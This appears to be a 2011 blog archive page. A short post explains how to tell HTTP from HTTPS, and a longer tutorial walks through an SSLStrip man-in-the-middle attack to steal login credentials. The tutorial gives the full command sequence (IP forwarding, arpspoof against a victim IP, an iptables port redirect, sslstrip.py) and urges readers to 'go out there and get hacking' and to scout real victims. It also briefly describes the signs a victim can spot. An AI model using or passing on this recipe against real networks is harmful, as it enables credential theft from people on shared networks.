Archive for August, 2011


Say you want to use the internet to do e-commerce, such as buy something from amazon.  In order to do this, you need to send your credit card number and other sensitive information across the Internet.  Over a normal HTTP connection, this data can be easily intercepted by an attacker.  This kind of attack is known as a Man-In-The-Middle attack.  There are many examples of things people do on the Internet in which some form of encryption should be used to protect that person.  The current solution to this problem is to encrypt the data before sending it in such a way that only the intended recipient will be able to decrypt it.  It’s called HTTPS (the ‘s’ stands for secure) and you’ve probably used it without even knowing it.

What I’d like to teach you is how to determine whether or not your connection is HTTP or HTTPS.  When you are using HTTPS, you can be sure that your personal information will safely and securely reach the destination*.

the difference is in the url that you type in to your internet browser. HTTP links are prefixed with “http://”, like the following example:

http://mail.google.com

On the other hand, HTTPS links are prefixed with “https://”, like the following example:

https://mail.google.com

Luckily, sites which would like to ensure their users connect securely, can re-direct you to HTTPS if you try to access HTTP.  Some sites like the example above, Gmail, will force secure communication.  This means if you manually type in http://mail.google.com and your browser fails to redirect you, Gmail will refuse your connection.

An easy way to tell the site you’re currently viewing is using HTTPS, click the lock icon in the left of the url bar:

If you click on “Certificate Information”, you can find out more about the certificate the website is using.

* This is not entirely true.  HTTPS traffic can be sniffed and decrypted by certain entities.  Many governments have the ability to intercept secure http traffic.  Also there have been several recent breaches of so-called “Certificate Authorities”, which have led to a handfull of rogue counterfeit certificates.  There are also tactics which one can use on a local area network to steal secure http traffic.  However, these methods are much less practical, and much less prevalent.  The fundamental difference comes down to http traffic traveling across the internet in plaintext, where as http secure traffic is encrypted and only readable by the intended receiver.

SSLStrip is a tool for executing Man-In-The-Middle attacks.  It allows you to steal HTTPS/SSL traffic, including usernames and passwords.  The only information you need to know about your victim in order to attack is their internal IP address, and the gateway address of the network you are on (which means you need to be on the same network as the victim to do this — A tutorial on hijacking wifi passwords coming soon).

I will be using backtrack linux as the attacker and windows xp as the victim.  Both are virtual machines.

First, run ifconfig and take note of what network interface you are currently using.  In the screenshot below (figure 1.1), my network interface is eth2.

Now lets make sure that ip_forwarding is enabled (need to be root).

echo 1 > /proc/sys/net/ipv4/ip_forward

and now verify that it worked.

cat /proc/sys/net/ipv4/ip_forward

should return 1.

Next, run arpspoof.  As the name suggests, it is an ARP spoofing tool.  use “-i <network interface>”, followed by “-t <target>” (your victim’s internal IP), and finally specify the internet gateway.  you will see ARP network traffic start to stream in the terminal window, as shown below (figure 1.2).

arpspoof -i eth2 -t 192.168.194.130 192.168.194.2

Now, in a new terminal window (don’t close arpspoof!) issue an iptables command.  Iptables is a tool for ipv4 maintenance.  I won’t go into any more detail for now.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

And finally, run SSLStrip.  we will use “-w <output file>” to specify somewhere to dump off the data we are redirecting.

python sslstrip.py -w output.dmp

Everything is now set up, and any HTTPS/SSL web browsing that the victim does will be dumped to the output file we specified when we started sslstrip.py.  That’s about all you need to know! Now go out there and get hacking!

Here’s some sample output from SSLStrip, notice the username and password in plaintext at the end of the string.

Now on the victim, I went to gmail.com before executing sslstrip.  once I started it, I signed in.  Very few people would notice this, or be weary if they noticed it, but traffic will now appear to the victim as HTTP.  SSLStrip will encrypt the packets before sending them to the gateway, as servers like gmail and paypal don’t allow http.

Here’s a visual representation of before and during an attack.

Illustrated in the picture below is one sign that you are being MITM’d.  While connecting to gmail, your browser will show that you are using HTTP.  It attempted HTTPS/SSL, but was unable to make the connection, so un-secure HTTP is forced.  Only a conscious and educated victim will identify this as suspicious, and of those people only the bored will care to investigate it.

Another way to tell that you are being MITM’ed is your arp address will change to the hacker’s internal IP.  Here’s a screenshot of the “arp -a” command being issued on the victim before and then during the attack.

One of the arts of SSLStrip attacks is the social engineering aspect.  You must gather recon on a potential victim and try to discern when they might be using their computer and on what networks they will be on.

Thanks for reading!